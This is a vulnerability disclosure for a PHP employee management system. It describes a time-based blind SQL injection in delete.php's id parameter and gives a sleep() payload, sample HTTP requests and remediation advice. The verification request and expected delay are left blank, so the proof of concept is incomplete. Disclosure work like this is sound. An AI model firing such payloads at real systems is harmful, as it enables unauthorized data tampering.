# EMPLOYEE_MANAGEMENT_SYSTEM 370project/delete.php SQL Injection Vulnerability ## Vulnerability Overview - **Vulnerability Type**: SQL Injection (Time-based Blind SQL Injection) - **Vulnerable File**: `370project/delete.php` - **Vulnerable Parameter**: The `id` parameter is retrieved directly from the URL and concatenated into the DELETE statement without parameterization. ## Impact Scope - Manipulation of database queries (unauthorized data modification/deletion, depending on database privileges) - Inference of database behavior/data via blind injection techniques - Reduction of availability by forcing expensive delayed database operations ## Exploit Code (Payload) ```sql (select*from(select(sleep(10))union/**/select(1))a) (select*from(select(sleep(10))union/**/select(1))a) ``` ## POC Verification **Normal Request (Baseline):** ```http GET /delete.php?id=101 HTTP/1.1 Host: 370project:82 Accept: text/html Connection: close ``` **Delayed Verification Request (URL-encoded):** ```http GET /delete.php?id= HTTP/1.1 Host: 370project:82 Accept: text/html Connection: close ``` **Expected Result**: The verification request should respond approximately `` seconds slower than the baseline request, indicating that malicious input has been injected. ## Remediation - Use parameterized queries (prepared statements) instead of string concatenation - Strictly validate and filter input parameters - Use an ORM framework or database abstraction layer ## Source Code Download https://code-projects.org/employee-management-system-in-php-with-source-code/